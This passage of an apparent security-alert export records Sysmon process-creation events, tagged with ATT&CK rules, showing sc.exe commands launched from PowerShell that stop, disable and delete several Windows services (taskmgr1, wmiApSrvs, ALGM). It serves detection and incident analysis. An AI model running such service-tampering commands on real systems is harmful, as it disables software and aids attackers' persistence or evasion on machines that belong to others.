Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.448",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.563 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010258c2600} +ProcessId: 7496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete taskmgr1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.582611900Z"",""eventRecordID"":""2983"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.563\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010258c2600}\r\nProcessId: 7496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.563"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010258c2600}"",""processId"":""7496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.433",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.524 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-00105d8b2600} +ProcessId: 5956 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop taskmgr1 +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.525763300Z"",""eventRecordID"":""2982"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.524\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-00105d8b2600}\r\nProcessId: 5956\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.524"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-00105d8b2600}"",""processId"":""5956"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.370",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.064 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010de872600} +ProcessId: 7088 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApServs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.066900700Z"",""eventRecordID"":""2979"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.064\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010de872600}\r\nProcessId: 7088\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.064"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010de872600}"",""processId"":""7088"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.309",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:50:58.007 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-001070842600} +ProcessId: 5044 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApSrvs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.010269000Z"",""eventRecordID"":""2976"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.007\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-001070842600}\r\nProcessId: 5044\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.007"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-001070842600}"",""processId"":""5044"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.292",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.974 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-001057832600} +ProcessId: 6504 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config wmiApSrvs Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config wmiApSrvs Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.976779500Z"",""eventRecordID"":""2975"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.974\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-001057832600}\r\nProcessId: 6504\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 
10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config wmiApSrvs Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.974"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-001057832600}"",""processId"":""6504"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config wmiApSrvs Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.260",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.939 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-001095812600} +ProcessId: 7404 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.941455200Z"",""eventRecordID"":""2973"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.939\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-001095812600}\r\nProcessId: 7404\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.939"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-001095812600}"",""processId"":""7404"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® 
Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.213",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.848 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010fc7e2600} +ProcessId: 1496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) 